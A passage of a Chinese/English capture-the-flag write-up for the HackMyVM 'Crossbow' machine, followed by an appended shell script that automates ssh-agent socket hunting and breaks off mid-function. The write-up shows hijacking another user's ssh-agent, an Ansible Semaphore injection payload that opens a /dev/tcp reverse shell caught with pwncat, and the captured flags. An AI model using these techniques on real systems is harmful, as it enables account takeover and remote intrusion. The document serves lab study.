find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount3\n\/usr\/bin\/ntfs-3g\n\/usr\/bin\/sudo\n\/usr\/bin\/ssh\n\/usr\/sbin\/pppd\n\/usr\/sbin\/exim4\n\/usr\/lib\/cockpit\/cockpit-session\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n(remote) polo@crossbow:\/home\/polo$ find \/ -writable -type f 2&gt;\/dev\/null\n\/home\/polo\/.profile\n\/home\/polo\/.bash_logout\n\/home\/polo\/.bashrc\n.......\n(remote) polo@crossbow:\/home\/polo$ cd \/home\n(remote) polo@crossbow:\/home$ ls\nlea  polo\n(remote) polo@crossbow:\/home$ cd lea\n(remote) polo@crossbow:\/home\/lea$ ls -la\ntotal 48\ndrwxr-xr-x 1 lea  lea  4096 Sep 18  2023 .\ndrwxr-xr-x 1 root root 4096 Sep 18  2023 ..\nlrwxrwxrwx 1 root root    9 Sep  5  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 lea  lea   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 lea  lea  3527 Sep 18  2023 .bashrc\ndrwx------ 2 lea  lea  4096 Sep 18  2023 .keychain\ndrwxr-xr-x 1 lea  lea  4096 Dec 14 18:29 .local\n-rw-r--r-- 1 lea  lea   807 Apr 23  2023 .profile\ndrwx------ 1 lea  lea  4096 Dec 14 17:55 .ssh\n(remote) polo@crossbow:\/home\/lea$ cd .ssh\nbash: cd: .ssh: Permission denied<\/code><\/pre>\n<p>\u51c6\u5907\u4f20<code>linpeas.sh<\/code>\u7684\u65f6\u5019\u53d1\u73b0\u4e86tmp\u6709\u5947\u602a\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/$ cd \/tmp\n(remote) polo@crossbow:\/tmp$ ls\ndbus-aOzC2qT5og  ssh-XXXXXXcE94FH  ssh-XXXXXXvsuvXX\n(remote) polo@crossbow:\/tmp$ file *\ndbus-aOzC2qT5og:  socket\nssh-XXXXXXcE94FH: directory\nssh-XXXXXXvsuvXX: directory\n(remote) polo@crossbow:\/tmp$ cd ssh-XXXXXXcE94FH\/\nbash: cd: ssh-XXXXXXcE94FH\/: Permission denied\n(remote) polo@crossbow:\/tmp$ cd ssh-XXXXXXvsuvXX\/\n(remote) 
polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ ls -la\ntotal 8\ndrwx------ 2 polo polo 4096 Apr  3 12:44 .\ndrwxrwxrwt 4 root root 4096 Apr  3 12:44 ..\nsrw------- 1 polo polo    0 Apr  3 12:44 agent.1259046\n(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ file agent.1259046 \nagent.1259046: socket<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u6b63\u5728\u8fd0\u884c\u6709\u76f8\u5173\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp$ ps aux | grep &quot;ssh&quot;\nroot          30  0.0  0.1  15404  3356 ?        Ss   12:01   0:00 sshd: \/usr\/sbin\/sshd [listener] 0 of 10-100 startups\nlea         1089  0.0  0.1   7792  2964 ?        Ss   12:01   0:00 ssh-agent\npolo     1259061  0.0  0.0   7660   776 ?        Ss   12:44   0:00 \/usr\/bin\/ssh-agent\npolo     1639650  0.0  0.0   3744  1892 pts\/1    S+   12:57   0:00 grep ssh<\/code><\/pre>\n<p>\u53d1\u73b0\u7528\u6237<code>lea<\/code>\u6b63\u5728\u6267\u884c<code>ssh-agent<\/code><\/p>\n<h3>ssh-agent\u52ab\u6301<\/h3>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u4e2a\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205684.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205684.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403210523198\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205685.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205685.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403210555216\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXvsuvXX\/agent.1259046; export SSH_AUTH_SOCK;<\/code><\/pre>\n<p>\u6ca1\u6bdb\u53cd\u5e94\uff0c\u6240\u4ee5\u8fd9\u524d\u9762\u662f\u8fde\u63a5\u4ee3\u7406\u7684\u610f\u601d\uff1f\u5c1d\u8bd5ssh\u8fde\u63a5\u4e00\u4e0b<code>lea<\/code>\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXvsuvXX\/agent.1259046; ssh lea@172.20.10.3\nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:TCA\/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:1: [hashed name]\n    ~\/.ssh\/known_hosts:4: [hashed name]\n    ~\/.ssh\/known_hosts:5: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
\nHost key verification failed.<\/code><\/pre>\n<p>\u8bf4\u660e\u662f\u6709\u6548\u7684\uff0c\u53ef\u80fd\u662f\u4f7f\u7528\u65b9\u6cd5\u4e0d\u5bf9\uff0c\u6d4f\u89c8<a href=\"https:\/\/smallstep.com\/blog\/ssh-agent-explained\/\">\u76f8\u5173\u6587\u7ae0<\/a>\uff0c\u53d1\u73b0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205686.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205686.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u4ee3\u7406\u8f6c\u53d1-in-action.png\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205687.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205687.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\u7279\u5de5\u52ab\u6301.png\" 
\/><\/div><\/p>\n<p>\u539f\u6765\u662f\u4ee3\u7406\u8f6c\u53d1\uff0c\u53ef\u80fd\u90a3\u4e2a\u9700\u8981\u5229\u7528\u7684agent\u85cf\u5728\u4e86\u6ca1\u8ba9\u6211\u4eec\u6253\u5f00\u7684\u90a3\u4e2a\u6587\u4ef6\u4e2d\uff0c\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089 \\ ssh lea@172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089  ssh lea@172.20.10.3\nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:TCA\/ssXFaEc0sOJl0lvYyqTVTrCpkF0wQfyj5mJsALc.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:1: [hashed name]\n    ~\/.ssh\/known_hosts:4: [hashed name]\n    ~\/.ssh\/known_hosts:5: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;172.20.10.3&#039; (ED25519) to the list of known hosts.\nlea@172.20.10.3&#039;s password: <\/code><\/pre>\n<p>\u770b\u6765\u6709\u673a\u4f1a\u554a\uff01<\/p>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u522b\u7684\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-apl\">lea\npolo\npedro<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.1089  ssh pedro@172.20.10.3\npedro@172.20.10.3&#039;s password:<\/code><\/pre>\n<p>\u5bf9\u80c3\u4e86\uff0c\u770b\u6765\u8fd9\u4e2a\u5bc6\u94a5\u7684\u8ba4\u8bc1\u548cpedro\u7684\u662f\u4e00\u6837\u7684\uff01\u67e5\u770b\u4e00\u4e0b\u8fdb\u7a0b\uff0c\u6ca1\u6709\u53d1\u73b0<code>pedro<\/code>\u76f8\u5173\u7684\uff0c\u53ef\u60dc\u3002<\/p>\n<pre><code class=\"language-bash\">ps -u pedro -o pid=<\/code><\/pre>\n<p>\u518d\u627e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">ps -ef | grep 
ssh-agent<\/code><\/pre>\n<p>\u6ca1\u6709\u6536\u83b7\uff0c\u67e5\u770b\u4e00\u4e0b\u8fdb\u7a0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/tmp\/ssh-XXXXXXvsuvXX$ ps aux\nUSER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\nroot           1  4.6  1.5  36932 31208 ?        Ss   12:01   4:04 \/usr\/bin\/python3 \/usr\/bin\/supervisord\nroot           6  0.0  0.0   2576   888 ?        S    12:01   0:00 \/bin\/sh \/usr\/sbin\/apachectl -D FOREGROUND\nroot           8  0.0  0.4 162176  8364 ?        Sl   12:01   0:00 \/usr\/lib\/cockpit\/cockpit-ws --no-tls\nlea           13  9.1  0.1   4564  3400 ?        S    12:01   7:59 \/bin\/bash \/home\/lea\/.local\/agent\nroot          20  0.0  1.2 201120 24412 ?        S    12:01   0:00 \/usr\/sbin\/apache2 -D FOREGROUND\nroot          26  0.0  0.1   3976  2132 ?        Ss   12:01   0:00 \/usr\/sbin\/cron\nroot          30  0.0  0.1  15404  3356 ?        Ss   12:01   0:00 sshd: \/usr\/sbin\/sshd [listener] 0 of 10-100 startups\nwww-data      58  0.3  0.6 201856 12680 ?        S    12:01   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nlea         1089  0.0  0.1   7792  2964 ?        Ss   12:01   0:00 ssh-agent\nwww-data  154228  0.3  0.6 201856 12684 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  154262  0.3  0.6 201856 12676 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  154300  0.3  0.6 201856 12696 ?        S    12:05   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263666  0.3  0.6 201856 12708 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263719  0.3  0.6 201704 12420 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263751  0.3  0.6 201712 12420 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263752  0.3  0.6 201868 12684 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263753  0.3  0.6 201856 12704 ?        
S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nwww-data  263754  0.3  0.6 201848 12656 ?        S    12:09   0:15 \/usr\/sbin\/apache2 -D FOREGROUND\nroot     1258977  0.0  0.2  11664  5484 ?        S    12:44   0:00 \/usr\/lib\/cockpit\/cockpit-session localhost\npolo     1259061  0.0  0.0   7660   776 ?        Ss   12:44   0:00 \/usr\/bin\/ssh-agent\npolo     1259123  0.0  0.4 309328  9084 ?        Sl   12:44   0:00 cockpit-bridge\npolo     1259141  0.0  0.2   8988  4148 ?        S    12:44   0:00 dbus-daemon --print-address --session\npolo     1266731  0.0  0.1   4608  3596 pts\/0    Ss   12:45   0:00 \/bin\/bash\npolo     1310390  0.0  0.1   4608  3692 pts\/0    S    12:46   0:00 bash -i\npolo     1310771  0.0  0.0   2936  1056 pts\/0    S+   12:46   0:00 \/usr\/bin\/script -qc \/usr\/bin\/bash \/dev\/null\npolo     1310773  0.0  0.1   4740  3864 pts\/1    Ss   12:46   0:00 \/usr\/bin\/bash\npolo     2575630  0.0  0.2   8536  4208 pts\/1    R+   13:28   0:00 ps aux\nlea      2575631  0.0  0.0   4728  1440 ?        
R    13:28   0:00 find \/tmp -name ssh-* -type d<\/code><\/pre>\n<p>No leads, so try our luck first and check whether any agent socket within fifty PIDs on either side lets us log in:<\/p>\n<pre><code class=\"language-bash\">for i in {1040..1140}; do SSH_AUTH_SOCK=\/tmp\/ssh-XXXXXXcE94FH\/agent.$i  ssh pedro@172.20.10.3; done<\/code><\/pre>\n<p>Keep pressing Enter:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205688.png\" alt=\"image-20240403213504381\" \/><\/p>\n<p>Lucky: it worked straight away.<\/p>\n<h3>Privilege escalation to root<\/h3>\n<p>Check the network connections:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205689.png\" alt=\"image-20240403214019154\" \/><\/p>\n<p>Two unfamiliar local ports show up:<\/p>\n<pre><code class=\"language-text\">127.0.0.1:3306\n127.0.0.1:3000<\/code><\/pre>\n<p>Visit them:<\/p>\n<pre><code class=\"language-html\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ curl 127.0.0.1:3306\ncurl: (1) Received HTTP\/0.9 when not allowed\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ curl 127.0.0.1:3000    1 \u21b5\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n  &lt;head&gt;\n    &lt;base href=&quot;\/&quot;&gt;\n    &lt;meta charset=&quot;utf-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width,initial-scale=1.0&quot;&gt;\n    &lt;link rel=&quot;icon&quot; href=&quot;favicon.png&quot;&gt;\n    &lt;title&gt;Ansible Semaphore&lt;\/title&gt;\n  &lt;script defer type=&quot;module&quot; src=&quot;js\/chunk-vendors.66355ca7.js&quot;&gt;&lt;\/script&gt;&lt;script defer type=&quot;module&quot; src=&quot;js\/app.b2fc4bb2.js&quot;&gt;&lt;\/script&gt;&lt;link href=&quot;css\/chunk-vendors.e1031f37.css&quot; rel=&quot;stylesheet&quot;&gt;&lt;link href=&quot;css\/app.13f6f466.css&quot; rel=&quot;stylesheet&quot;&gt;&lt;script defer src=&quot;js\/chunk-vendors-legacy.b392e67e.js&quot; nomodule&gt;&lt;\/script&gt;&lt;script defer src=&quot;js\/app-legacy.cefb5b9b.js&quot; nomodule&gt;&lt;\/script&gt;&lt;\/head&gt;\n  &lt;body&gt;\n    &lt;noscript&gt;\n      &lt;strong&gt;\n          We&#039;re sorry but web doesn&#039;t work properly\n          without JavaScript enabled. Please enable it to continue.\n      &lt;\/strong&gt;\n    &lt;\/noscript&gt;\n    &lt;div id=&quot;app&quot;&gt;&lt;\/div&gt;\n    &lt;!-- built files will be auto injected --&gt;\n  &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Port 3306 is MySQL speaking a non-HTTP protocol, hence the curl error; port 3000 serves Ansible Semaphore.<\/p>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ crontab -l\nno crontab for pedro\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -writable -type f 2&gt;\/dev\/null\n\/sys\/kernel\/security\/apparmor\/.remove\n\/sys\/kernel\/security\/apparmor\/.replace\n\/sys\/kernel\/security\/apparmor\/.load\n\/sys\/kernel\/security\/apparmor\/.access\n\/sys\/kernel\/security\/tomoyo\/self_domain\n\/home\/pedro\/.profile\n\/home\/pedro\/.zsh_history\n\/home\/pedro\/.zcompdump-crossbow-5.9\n\/home\/pedro\/user.txt\n......\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ cat \/home\/pedro\/user.txt\n58cb1e1bdb3a348ddda53f22ee7c1613<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205690.png\" alt=\"image-20240403214532630\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205691.png\" alt=\"image-20240403214604786\" \/><\/p>\n<p>Look for it:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -name Semaphore -type f 2&gt;\/dev\/null\n\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ find \/ -name semaphore -type f 2&gt;\/dev\/null\n\/usr\/bin\/semaphore<\/code><\/pre>\n<p>Nice, and it is on the PATH. Try running it:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ semaphore\nAnsible Semaphore is a beautiful web UI for Ansible.\nSource code is available at https:\/\/github.com\/ansible-semaphore\/semaphore.\nComplete documentation is available at https:\/\/ansible-semaphore.com.\nUsage:\n  semaphore [flags]\n  semaphore [command]\nAvailable Commands:\n  completion  generate the autocompletion script for the specified shell\n  help        Help about any command\n  migrate     Execute migrations\n  server      Run in server mode\n  setup       Perform interactive setup\n  upgrade     Upgrade to latest stable version\n  user        Manage users\n  version     Print the version of Semaphore\nFlags:\n      --config string   Configuration file path\n  -h, --help            help for semaphore\nUse &quot;semaphore [command] --help&quot; for more information about a command.<\/code><\/pre>\n<p>Check the version:<\/p>\n<pre><code class=\"language-bash\">\u256d\u2500pedro@crossbow ~ \n\u2570\u2500$ semaphore version\nv2.8.90<\/code><\/pre>\n<p>Google it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205692.png\" alt=\"image-20240403214948753\" \/><\/p>\n<p>Found an <a href=\"https:\/\/gist.github.com\/Alevsk\/1757da24c5fb8db735d392fd4146ca3a\">attack method<\/a>:<\/p>\n<pre><code class=\"language-text\">[Attack Vectors]\n\nThe --extra-vars parameter can be abused by a malicious user with low privileges to achieve Remote Command Execution (RCE) and read files and configurations, perform Server Side Request Forgery (SSRF), execute commands, and establish a reverse shell on the ansible server.\n\nPayload:\n\n{&quot;ansible_user&quot;: &quot;{{ lookup(&#039;ansible.builtin.pipe&#039;, \\&quot;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/127.0.0.1\/1337 &lt;&amp;1&#039;\\&quot;) }}&quot;}<\/code><\/pre>\n<p>Set up a port forward, otherwise we cannot reach the UI:<\/p>\n<pre><code class=\"language-bash\">socat TCP-LISTEN:3001,fork TCP:127.0.0.1:3000<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205693.png\" alt=\"image-20240403215410377\" \/><\/p>\n<p>Tried weak passwords and SQL-injection style auth-bypass strings; <code>admin:admin<\/code> got us in.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205695.png\" alt=\"image-20240403215519333\" \/><\/p>\n<p>Then set the environment variables (the extra vars that carry the payload):<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205696.png\" alt=\"image-20240403215734426\" \/><\/p>\n<p>Save it (scroll down).<\/p>\n<p>Start a listener locally:<\/p>\n<pre><code class=\"language-bash\">sudo pwncat-cs -lp 1234 2&gt;\/dev\/null<\/code><\/pre>\n<p>Then run it:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205697.png\" alt=\"image-20240403215930500\" \/><\/p>\n<p>Then:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205698.png\" alt=\"image-20240403220019000\" \/><\/p>\n<p>An error appeared:<\/p>\n<pre><code class=\"language-text\">ERROR: Ansible could not initialize the preferred locale: unsupported locale setting<\/code><\/pre>\n<p>No locale is set, so set one:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205699.png\" alt=\"image-20240403220312094\" \/><\/p>\n<pre><code class=\"language-json\">{\n    &quot;LC_ALL&quot;:&quot;en_US.UTF-8&quot;,\n    &quot;LANG&quot;:&quot;en_US.UTF-8&quot;\n}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205700.png\" alt=\"image-20240403220339999\" \/><\/p>\n<p>Then the root shell came back:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205701.png\" alt=\"image-20240403220444891\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205702.png\" alt=\"image-20240403220434285\" \/><\/p>\n<p>Find the flag!<\/p>\n<pre><code class=\"language-bash\">(remote) root@crossbow.hmv:\/root# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\n(remote) root@crossbow.hmv:\/root# cd \/root\n(remote) root@crossbow.hmv:\/root# ls\nclean.yml  config.json  root.txt\n(remote) root@crossbow.hmv:\/root# cat root.txt \n7a299c41b1daac46d5ab98745b212e09<\/code><\/pre>\n<h2>Extra takeaways<\/h2>\n<h3>Another writer&#039;s elegant one-liner for filtering users<\/h3>\n<p><a href=\"https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Crossbow\/\">https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Crossbow\/<\/a><\/p>\n<pre><code class=\"language-bash\">awk -F: &#039;($3&gt;=1000)&amp;&amp;($1!=&quot;nobody&quot;){print $1}&#039; \/etc\/passwd<\/code><\/pre>\n<p>He also gave a reference: <a href=\"https:\/\/askubuntu.com\/questions\/979911\/strange-folder-in-tmp-with-name-ssh\">https:\/\/askubuntu.com\/questions\/979911\/strange-folder-in-tmp-with-name-ssh<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Crossbow Information gathering Port scan rustscan -a 172.20.10.3 &#8212; -A Open 1 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-498","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=498"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498\/revisions"}],"predecessor-version":[{"id":499,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/498\/revisions\/499"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=498"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
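The ssh-agent socket hunt in the write-up above (the `for i in {1040..1140}` loop that needed Enter pressed a hundred times) and the awk user filter from the extra takeaways, combined into one added shell example. This is not code from the original post or from any tool it names. It assumes `ssh` and `ssh-add` are on PATH and that `TARGET` is the box from the write-up (172.20.10.3); everything else it reads comes from the filesystem it runs on, and the sample passwd content used to exercise it is constructed. Two points the loop in the post glosses over: the socket suffix is the PID ssh-agent had before it forked into the background, so it is near but not equal to the daemon PID shown by `ps`, which is the likely reason agent.1089 asked for a password while a neighbouring number worked; and `ssh-add -l` against a socket tells you whether it holds keys before you try any login, while `-o BatchMode=yes` makes a rejected key fail instantly instead of prompting for a password.

```sh
#!/bin/sh
# Added example, not code from the original write-up. It automates two manual
# steps from the post: picking login candidates from /etc/passwd (the awk
# one-liner from the "extra takeaways" section) and finding a usable
# ssh-agent socket under /tmp without guessing PIDs one at a time.
#
# Assumptions (not from the page): ssh and ssh-add are on PATH, and TARGET
# is the box from the write-up; override it for any other host.

TARGET="${TARGET:-172.20.10.3}"

# Interactive accounts: UID >= 1000, excluding nobody.
# Argument: passwd file to read (default /etc/passwd). One user per line.
candidate_users() {
    awk -F: '($3>=1000)&&($1!="nobody"){print $1}' "${1:-/etc/passwd}"
}

# Every agent socket path under a directory, sorted. ssh-agent creates
# /tmp/ssh-XXXXXXXXXX/agent.<pid>, where <pid> is the PID the agent had
# before it forked into the background, so the suffix is near, but not
# equal to, the daemon PID that ps shows.
list_agent_sockets() {
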